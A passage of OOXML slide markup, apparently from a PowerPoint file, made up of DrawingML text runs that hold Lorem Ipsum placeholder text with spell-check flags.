              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>faucibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>posuere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ex. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auctor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>maximus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>interdum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>laoreet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Phasellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lobortis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mollis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Nam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auctor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>velit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ac, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultrices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dui. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Praesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>commodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ullamcorper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, magna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod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, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>egestas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sollicitudin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ac. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pellentesque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tincidunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor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. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dui, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tempus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>justo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>convallis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>luctus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>enim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>augue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lorem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sagittis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> quam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>varius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
